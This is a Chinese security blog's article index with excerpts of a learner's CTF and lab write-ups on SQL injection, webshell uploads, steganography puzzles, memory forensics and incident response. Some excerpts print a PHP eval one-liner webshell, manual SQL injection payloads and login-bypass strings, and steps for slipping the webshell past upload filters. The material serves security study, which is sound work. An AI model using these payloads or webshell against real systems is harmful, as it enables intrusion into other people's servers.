
网络安全CTF比赛
取证、web、ctf、编程、kali,应急响应、等等
小晨_WEB
学web 从入门到萌新
展开
-
AWD攻防比赛流程手册
AWD:Attack With Defence,即攻防对抗,比赛中每个队伍维护多台服务器(一般两三台,视小组参赛人数而定),服务器中存在多个漏洞(web层、系统层、中间件层等),利用漏洞攻击其他队伍可以进行得分,加固时间段可自行发现漏洞对服务器进行加固,避免被其他队伍攻击失分。原创 2024-06-14 18:48:42 · 2650 阅读 · 0 评论 -
SQL手工注入漏洞测试(MySQL数据库)
靶场地址SQL手工注入漏洞测试(MySQL数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养1、我们先找出注入点2、测试原创 2022-03-31 18:18:27 · 2159 阅读 · 0 评论 -
BUU SQL COURSE 11
打开之后 F12查看http://7a0c2d1a-3ae3-4815-850d-9e229cef2e1f.node4.buuoj.cn:81/backend/content_detail.php?id=1找到注入点sql手工注入流程1、判断注入类型 ?id=1 or 1=1 ?id=1' or '1'='12、判断列数:?id=1 order by 1,2,33、判断注入点:?id=-1 union select 1?id=-1 union select 1,2,3..原创 2022-04-19 18:36:49 · 1518 阅读 · 2 评论 -
webshell文件上传漏洞分析溯源(第四题)
burpsite抓包修改MIME信息Content-Type 请求的与实体对应的MIME信息 Content-Type: application/x-www-form-urlencoded原创 2022-04-07 15:55:23 · 196 阅读 · 0 评论 -
[HBNIS2018]来题中等的吧1
1、摩斯电码flag{alphaalab}原创 2022-03-23 19:14:45 · 423 阅读 · 0 评论 -
安鸾平台 文件上传
文件上传原创 2022-09-30 21:45:02 · 384 阅读 · 0 评论 -
[GXYCTF2019]gakki1
1、查看到有flag信息我们分离得到 zip 有,密码直接破解 zip打开文件 一推乱码到这里不会了 就直接百度了原来是要进行字频分析 需要写脚本# -*- coding:utf-8 -*-#Author: mochu7alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890!@#$%^&*()_+- =\\{\\}[]"strings = open('...原创 2022-03-23 19:48:28 · 931 阅读 · 0 评论 -
谁赢了比赛?1
1、直接数据打开 看见flag.txt2、分离出来 数据包有密码 、破解使用stegsolve软件 打开 查看帧数到310保存下来 再打开 切换通道 得到图片使用qr识别flag{shanxiajingwu_won_the_game}...原创 2022-03-23 19:02:17 · 205 阅读 · 0 评论 -
WebShell文件上传漏洞分析溯源(第2题)
关闭js验证 就可以上传一句话文件了菜刀连接得到key原创 2022-04-07 15:08:19 · 191 阅读 · 0 评论 -
[BJDCTF2020]纳尼1
打开文件修改文件头效果如下使用Stegsolve保存这是一个base64编码 我们拿去解码https://tool.oschina.net/encrypt?type=3flag{wang_bao_qiang_is_sad}原创 2022-03-23 17:46:44 · 324 阅读 · 0 评论 -
[SWPU2019]我有一只马里奥1
直接打开程序 得到1.txt提示ntfs 我们直接使用软件 来进行扫描得到flagswupctf{ddg_is_c00000100| 75 74 65 7Dute}原创 2022-03-23 18:41:22 · 453 阅读 · 0 评论 -
[ACTF新生赛2020]outguess1
1、通过数据查看 发现图片中的编码2、 解密得到ABCCTF在线工具-在线核心价值观编码|核心价值观编码算法|Core Values Encoder3、结合题目名字,对这张图片进行使用outguess导出隐写内容安装教程:1、outguess下载安装_By Yang的博客-优快云博客outguess -k 'abc' -r mmm.jpg flag.txt 4、得到flag :flag{gue33_Gu3Ss!2020}...原创 2022-03-23 18:14:47 · 653 阅读 · 0 评论 -
真的很简单 i春秋
题目描述在环境里面 浏览器 访问http://file.ichunqiu.com/49ba59ab下载dedeCMS。下载工具进行爆破第一个是账号 、第二个是md5加密MD5免费在线解密破解_MD5在线加密-SOMD5接下来是找后门目录。查找后台地址,手动输了几个常见的,结果不行;用御剑扫了一下,结果也扫不出来我们进行百度搜索cms相关后台dedeCMS漏洞:mysqli_error_trace.inc 文件里会残留后台路径。dedeCMS目录中的data...原创 2022-04-12 16:49:36 · 1181 阅读 · 0 评论 -
《从0到1:CTFer成长之路》
一、判断注入类型二、猜解列名数量(字段数)?id=1' order by 1%23发现4,页面不正常,所以字段数为1,2,3三、查看报错位(报错位:2和3)?id=123' union select 1,2,3 %23四、信息收集1、数据库名称:database()得到数据库名称:note2、表的信息?id=123' union select 1,database(),group_concat(table_name) from information.原创 2022-04-12 22:17:40 · 1735 阅读 · 0 评论 -
WebShell文件上传漏洞分析溯源(第3题)
burp抓包一句话木马 写到图片里面抓包修改png 为php 上传即可菜刀连接得到flag原创 2022-04-07 15:48:54 · 532 阅读 · 0 评论 -
CTF_Misc_Disk 恢复题
1、打开文件 hex分析到有root 判断是Linux文件2、我们linux打开看一下└─$ file disk2disk2: Linux rev 1.0 ext3 filesystem data, UUID=f4d4c80b-0724-4c50-89cc-bfb6f962131c (large files)这是一个ext33、我们挂载看看┌──(root㉿kali)-[/home]└─# mkdir disk-misc ...原创 2022-04-13 19:59:11 · 2709 阅读 · 0 评论 -
WebShell文件上传漏洞分析溯源(第1题)
题目地址:WebShell文件上传漏洞分析溯源(第1题)_文件上传_在线靶场_墨者学院_专注于网络安全人才培养一句话木马文件<?php eval(@$_POST['123456']);?>接下来使用burpsite1、设置代理2、配置burpsite 代理抓包 ctrl +r...原创 2022-04-07 14:52:29 · 1411 阅读 · 0 评论 -
[HBNIS2018]excel破解1
直接打开搜索flag或者修改或者后缀名成zip 也可以。。。。。。原创 2022-03-23 18:36:51 · 579 阅读 · 0 评论 -
安鸾-RCE命令执行
1、万能密码登录 1' or 1# 密码随意 2、admin' or 1=1# 密码随意 直接弱口令。:写入到当前目录下的shell.php(没有就创建一个)1、webshell 中国菜刀。写入一句话 菜刀连接。原创 2022-10-08 17:23:25 · 769 阅读 · 0 评论 -
rce命令执行
概述RCE(remote command/code execute)漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。远程系统命令执行一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全控原创 2022-04-07 16:56:22 · 1667 阅读 · 0 评论 -
[BJDCTF2020]一叶障目1
题目图片长这样使用010 Editor打开出现CRC不匹配报错修改高度看一下flag{66666}原创 2022-03-23 17:15:45 · 290 阅读 · 0 评论 -
墨者学院-WebShell文件上传漏洞分析溯源(第4题)
burp抓包修改content-type类型原创 2022-04-07 15:57:37 · 165 阅读 · 0 评论 -
[SWPU2019]伟大的侦探1
1、misc需要密码2、使用软件010editor ebcdlc编码3、得到密码wllm_is_the_best_team!直接解压4、打开文件18 张图片,福尔摩斯小人密码然后我们对照图片得到flag{iloveholmesandwllm}原创 2022-03-23 20:15:58 · 1133 阅读 · 0 评论 -
outguess下载安装
1.在kali下的安装命令:git clone https://github.com/crorvick/outguess #在github上下载安装包2.下载的安装包下载到了文件夹内,找到outguess文件夹cd进入文件夹,输入命令:./configure && make && make install #进行安装3.使用命令:outguess -h #查看使用该工具的命令格式>>>>>>>...原创 2022-03-23 18:08:08 · 3829 阅读 · 0 评论 -
金砖技能大赛-应急响应-内存镜像分析-进程分析
作为信息安全技术人员必须能够掌握内容镜像分析、重要数据恢复、 恶意文件分析等相关技能,利用这些技能我们能够第一时间分析相关恶意文件、 分析蛛丝马迹帮助我们更好的完成应急响应工作。 应急响应阶段题目主要包含:Windows 内存镜像分析,Linux 内存镜像分析, 磁盘文件恢复,恶意程序分析等内容。原创 2022-09-30 18:15:12 · 5470 阅读 · 2 评论 -
中职组-网络空间安全18年
第一部分任务一、nmap1、nmap sP-n 192.168.100.133 //进行ping扫描1.1、nmap -Pn -n 192.168.100.133 //目标禁用 绕过ping 扫描2、nmap -A -n ip // 对ip进行综合性扫描3、nmap -O -n ip //对操作系统版本识别 扫描4、nmap -O -sV -n ip //系统服务及版本扫描 -sV:探测开放的端口的系统/服务信息 任务三、arp扫描渗透测试1、arping...原创 2022-04-14 22:09:54 · 298 阅读 · 0 评论 -
Volatility使用与实战
一、安装Volatility下载Volatility 2.6 Release下载下来的文件放到/usr/local目录下,用户自己编译的软件默认会安装到这个目录下(放可执行文件也没问题吧)1、解压命令:unzip FileName.zip2、文件夹: mkdir3、mv 改名volatility//有可能会权限失败 那就单独把文件拿出来 使用添加环境变量echo $PATH直接使用二、案列实战使用imageinfo插件来猜测dump..原创 2022-03-29 14:37:18 · 6074 阅读 · 2 评论 -
在线靶场-墨者-电子数据取证1星-Linux硬盘文件分析取证(SSH过的IP)
1、加载2、挂载3、查看历史命令的文件4、搜索原创 2022-03-27 20:30:10 · 1772 阅读 · 0 评论 -
信息安全管理与评估知识概括
一、应急响应-取证////////////////////// 内存取证Volatility imageinfo 获取系统类型 netscan 查看网络连接 cmdline 看详细情况 cmdscan iehistory查看浏览器历史记录 pslist 获取进程 hashdump 获取密码 破解hashhttps://blog.youkuaiyun.com/boy_from_village/article/details/80383419 file...原创 2022-04-11 15:12:21 · 5877 阅读 · 1 评论 -
windows应急响应
一、工具扫描使用木马查杀工具 对web后门 进行查找如d盾、、、二、日志分析、端口、进程、开机、注册表1、网站通常是看中间件日志,通常目录是在中间件的logs目录下的acces.log文件。2、端口netstat -ano参数说明:-a 显示所有网络连接、路由表和网络接口信息-n 以数字形式显示地址和端口号-o 显示与每个连接相关的所属进程 ID-r 显示路由表-s 显示按协议统计信息、默认地、显示 IP常见的状态说明:LISTENING 侦听状态ESTABL原创 2022-03-29 14:38:47 · 3359 阅读 · 0 评论 -
应急响应linux 2
入侵排查一、账号安全1、用户信息文件 /etc/passwd[root@localhost log]# more /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologinhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologin..........2、用户密码信息 /etc/shadow原创 2022-03-27 16:21:09 · 1183 阅读 · 0 评论 -
应急响应Linux 1
1、我们首先查看了系统的登录日志,查看是否有可疑登录信息,执行如下命令:more/var/log/secure如下图:2、查看一下系统密码文件/etc/shadow这样可以查看 有没有可疑信息 更改密码之类的、、、、3、还可以查看其它日志信息、、、、、、、、、、、、、4、ps命令 查看进程[root@localhost log]# ps PID TTY TIME CMD 2782 pts/0 00:00:00 sudo 2789 pts/...原创 2022-03-27 15:13:56 · 2880 阅读 · 0 评论